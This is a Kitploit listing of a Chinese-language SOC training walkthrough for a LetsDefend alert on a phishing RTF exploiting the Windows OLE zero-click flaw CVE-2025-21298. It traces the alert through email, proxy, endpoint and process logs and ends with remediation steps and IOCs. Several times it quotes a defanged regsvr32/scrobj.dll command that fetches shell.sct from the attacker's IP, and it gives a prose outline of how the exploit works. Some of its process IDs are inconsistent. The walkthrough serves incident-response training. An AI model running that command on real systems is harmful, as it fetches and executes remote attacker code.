Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298 — SOC336 - Windows OLE 零点击 RCE 漏洞利用检测 (CVE-2025-21298) 演练 | Kitploit
工具/GitHubGitHub/abc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298
漏洞分析漏洞利用横向移动逆向工程取证分析钓鱼攻击恶意软件分析命令与控制威胁情报
学习与教育
事件响应
电子邮件安全
GitHubabc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298

SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

SOC336 - Windows OLE 零点击 RCE 漏洞利用检测 (CVE-2025-21298) 演练

查看仓库网站
63个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

LinkedIn Gmail Instagram 旧版 Discord Reddit


SOC336 - Windows OLE 零点击远程代码执行漏洞检测 (CVE-2025-21298) 演练

钓鱼邮件

🔎 目录
  1. 情境
  2. 告警概览
  3. 使用的工具
  4. 分析
  • 邮件安全
  • 日志管理
    • 代理日志
  • 端点安全
    • 终端历史
    • 网络行为
    • 进程
    • CVE-2025-21298
  • 剧本
  • 分析师备注
  • 参考
  • (返回顶部)

    情境

    我们的一名员工Austin收到了一封来自可疑发件人的钓鱼邮件,他在2025年2月4日下午4:18使用Outlook打开该邮件后触发了告警。触发原因为 "检测到恶意RTF附件,带有已知的CVE-2025-21298漏洞利用模式"。

    (返回顶部)

    告警概览

    告警概览截图

    事件ID : 314

    事件时间 : 2025年2月4日下午4:18(我认为时间有误)

    规则 : SOC336 - 检测到Windows OLE零点击远程代码执行漏洞利用 (CVE-2025-21298)

    级别 : 安全分析师

    SMTP地址 : 84.38.130.118

    源地址 : [email protected]

    目标地址 : [email protected]

    邮件主题 : 重要:即将到来的项目截止日期需要立即行动

    附件 : mail.rtf

    附件哈希 : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

    设备动作 : 允许

    触发原因 : 检测到恶意RTF附件,带有已知的CVE-2025-21298漏洞利用模式。

    (返回顶部)

    使用的工具

    1. VirusTotal
    2. AbuseIPDB
    3. Gemini

    (返回顶部)

    分析

    让我们深入检查邮件安全、日志管理和端点安全日志,以进行告警分类。

    邮件安全

    邮件安全截图

    我搜索了发件人地址 projectmanagement@pm[.]me,并点击了同一日凌晨5:12发送的邮件"重要:即将到来的项目截止日期需要立即行动"。这让我觉得奇怪,因为"重要"和"需要立即行动"等紧急语气和措辞让我意识到这是一封钓鱼邮件。



    VirusTotal域名查询截图

    我在VirusTotal上搜索了域名 pm[.]me,仅有一家供应商将其判定为可疑。



    SMTP地址查询截图

    然而,当我搜索SMTP地址 84[.]38[.]130[.]118 时,有7家供应商将其标记为恶意和恶意软件,并且它与SILVER C2服务器相关。



    AbuseIPDB查询截图1
    AbuseIPDB查询截图2

    84[.]38[.]130[.]118 也出现在AbuseIPDB数据库中。它位于拉脱维亚里加,属于域名 rixhost.lv,被归类为DDoS攻击、黑客攻击和被利用主机。



    附件哈希查询截图

    最后,我在VirusTotal上搜索了附件 mail.rtf 的哈希值 df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184,61家供应商中有29家将该附件标记为恶意。它属于恶意软件家族 rtfmalformb,并与漏洞 CVE-2025-21298 相关联。

    确认了Austin收到的是一封带有恶意附件的钓鱼邮件。

    (返回顶部)

    日志管理

    让我们调查一下Austin在凌晨5:12打开钓鱼邮件后是否有可疑活动。

    代理日志

    代理日志截图

    我首先检查了代理日志,搜索了发件人的恶意IP地址 84[.]38[.]130[.]118,发现早上8:06有一条由 cmd.exe 发起的HTTP GET请求,指向该恶意IP地址的URL hxxp://84[.]38[.]130[.]118/shell[.]sct,下载了一个Windows脚本文件。响应代码为200 OK,表明出站流量被允许且未被防火墙阻止。获取一个可能包含反向shell脚本的脚本文件是不正常的。

    (返回顶部)

    端点安全

    终端历史

    终端历史截图1
    终端历史截图2

    由于向恶意IP地址的出站流量是由 cmd.exe 发起的,我首先检查了终端历史,发现早上8:06:08执行了命令 "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll",该命令衍生出 regsvr32.exe 从恶意IP地址通过 scrobj.dll 获取脚本文件。

    • regsvr32.exe: 一个命令行实用程序,用于注册和取消注册OLE控件,如DLL和ActiveX控件到Windows注册表
    • /s: regsvr32.exe 在后台静默运行
    • /u: 强制Windows不将此键添加到注册表
    • /i: 接口
    • scrobj.dll: 用于处理脚本文件的脚本对象运行时库

    使用Windows内置实用程序获取脚本可以在系统上留下最少的痕迹,使逆向工程和恶意软件分析过程更加困难!

    (返回顶部)

    网络行为

    网络行为截图

    确认在命令执行事件之后,早上8:06:42与恶意IP 84[.]38[.]130[.]118存在连接。

    (返回顶部)

    进程

    那么为什么仅仅点击一封邮件就会执行 cmd.exe?虽然没有发现Austin下载恶意附件 mail.rtf 的证据,但我检查了端点日志,搜索了早上8:06左右的事件。

    进程日志1

    进程ID: 7023

    事件时间: 2025年2月4日 08:06:25

    命令行: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

    父进程: cmd.exe



    进程日志2

    好的,那么让我们看看父进程 cmd.exe

    进程ID: 6784

    事件时间: 2025年2月4日 08:06:08

    命令行: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

    父进程: outlook.exe



    进程日志3

    最后检查了 outlook.exe 的父进程

    进程ID: 4820

    事件时间: 2025年2月4日 08:05:15

    命令行: "C:\Windows\System32\cmd.exe"

    父进程: explorer.exe



    因此我们可以总结恶意进程树:

    explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> 脚本执行!

    然而,我仍然质疑恶意进程是如何在没有下载和打开恶意附件的情况下被启动的,以及 outlook.exe 是如何衍生出恶意进程的,直到我发现了关于 CVE-2025-21298 的信息。

    (返回顶部)

    CVE-2025-21298

    CVE-2025-21298文章截图

    根据 Offsec 的文章,2025年1月存在一个严重的Windows OLE零点击漏洞,允许通过电子邮件实现远程代码执行,CVSS评分为9.8。当目标收件人仅在Microsoft Outlook中打开或预览包含带有嵌入式脚本的恶意RTF文档时,漏洞被触发,攻击者可以在受影响系统上执行任意代码。

    我在Google和Gemini上研究了Windows OLE和RTF文档的劫持过程,并结合我的一些逆向工程知识:

    1. 当打开或预览RTF文档时,ole32.dll中的 UtOlePresStmToContentsStm 函数会指向 pstmContents 所指向的OLE对象,以读取缩略图图像数据(OlePres)并将其转储到实际数据文件(CONTENT)中。
    2. 由于攻击者RTF文件的格式损坏,该函数立即触发意外的处理错误,导致OLE对象被删除,但 pstmContents 指针未被删除。
    3. 恶意RTF文件创建了一个与已删除OLE对象大小完全相同的恶意OLE对象,填充了仍然由 pstmContents 指针指向的同一内存空间。
    4. 在Outlook完成预览后,它运行包含恶意代码"regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"的虚假"清理"进程,该代码位于恶意伪造的OLE对象中。
    5. 受害者的系统执行远程负载,并自动建立反向shell,无需任何点击。

    (返回顶部)

    剧本

    剧本截图1
    剧本截图2
    剧本截图3
    剧本截图4
    剧本截图5
    剧本截图6

    未隔离

    剧本截图7

    恶意

    剧本截图8

    已访问

    剧本截图9
    剧本截图10
    剧本截图11
    剧本截图12
    剧本截图13
    剧本截图14
    剧本截图15

    (返回顶部)

    分析师备注

    分类: 严重

    类型: 恶意软件

    活动时间:

    2025年2月4日 05:12 AM (收到钓鱼邮件)

    2025年2月4日 08:05:15 AM - 2025年2月4日 08:06:42 AM (打开钓鱼邮件并执行恶意代码)

    受影响实体:

    源地址: projectmanagement@pm[.]me

    SMTP地址: 84[.]38[.]130[.]118

    收件人邮箱地址: Austin@letsdefend[.]io

    收件人IP地址: 172[.]16[.]17[.]137

    主机名: Austin

    确认为真阳性原因:

    2025年2月4日凌晨5:12,一封可疑邮件,主题为"重要:即将到来的项目截止日期需要立即行动",由 [email protected] (IP地址: 84.38.130.118) 发送至 [email protected] (IP地址: 172.16.17.137),附件为 mail.rtf (SHA256哈希: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)。主题中使用的紧急语气和措辞暗示这是一封钓鱼邮件。威胁情报平台VirusTotal和AbuseIPDB将发件人IP地址(位于拉脱维亚里加,属于域名 rixhost.lv)和附件标记为恶意和恶意软件。

    根据代理日志,早上8:06有一条由 cmd.exe 发起的HTTP GET请求,指向恶意IP地址的URL hxxp://84[.]38[.]130[.]118/shell[.]sct,下载了一个Windows脚本文件。响应代码为200 OK,表明出站流量被允许且未被防火墙阻止。

    根据端点安全日志,恶意代码 "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) 由 cmd.exe (PID: 6784) 发起,而 cmd.exe 由 outlook.exe (PID: 4820) 衍生。

    该漏洞利用是由一个严重的Windows OLE零点击漏洞 (CVE-2025-21298) 引起的,该漏洞允许通过电子邮件实现远程代码执行,CVSS评分为9.8(2025年1月)。当目标收件人仅在Microsoft Outlook中打开或预览包含带有嵌入式脚本的恶意RTF文档时,漏洞被触发,攻击者可以在受影响系统上执行任意代码,并可能建立到C2服务器的反向shell。

    升级原因:

    尽管尚未明确观察到活跃的后期利用C2网络流量,但端点安全日志确认了 regsvr32.exe 已使用 scrobj.dll 执行,以获取脚本文件 shell.sct。由于CVE-2025-21298的CVSS评分为9.8,需要进一步调查主机上是否存在任何可疑活动,如持久化或数据泄露。

    修复措施:

    • 立即将主机Austin从公司内部网络断开
    • 终止进程 "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" 及其相关进程 cmd.exe、outlook.exe
    • 阻止指向 84[.]38[.]130[.]118 的出站流量
    • 将域名 rixhost[.]lv 加入黑名单
    • 在邮件服务器上将发件人 projectmanagement@pm[.]me 加入黑名单
    • 修补漏洞 CVE-2025-21298
    • 重置Austin的凭证
    • 对主机Austin执行内存分析,调查执行 shell.sct 后的恶意活动,如C2连接、持久化、数据泄露
    • 对 shell.sct 执行逆向工程
    • 执行邮件分析,调查邮件头中的原始IP、回复地址
    • 阻止由 regsvr32.exe 发起的互联网访问
    • 开展钓鱼意识宣传活动,教育员工不要打开未知发件人发送的邮件,或带有紧急语气或措辞的邮件

    入侵指标:

    • 发件人地址:projectmanagement@pm[.]me
    • 发件人IP地址:84[.]38[.]130[.]118 发件人域名:rixhost[.]lv
    • 钓鱼邮件:"重要:即将到来的项目截止日期需要采取行动"
    • 恶意文档:mail.rtf (SHA256哈希:df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)
    • 恶意进程树:outlook.exe (PID: 4820) -> cmd.exe (PID: 6784) -> regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023)
    • 第二有效载荷URL:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll

    (返回顶部)

    参考资料

    CVE-2025-21298 详情

    CVE-2025-21298:一个关键的Windows OLE零点击漏洞

    (返回顶部)

    下载工具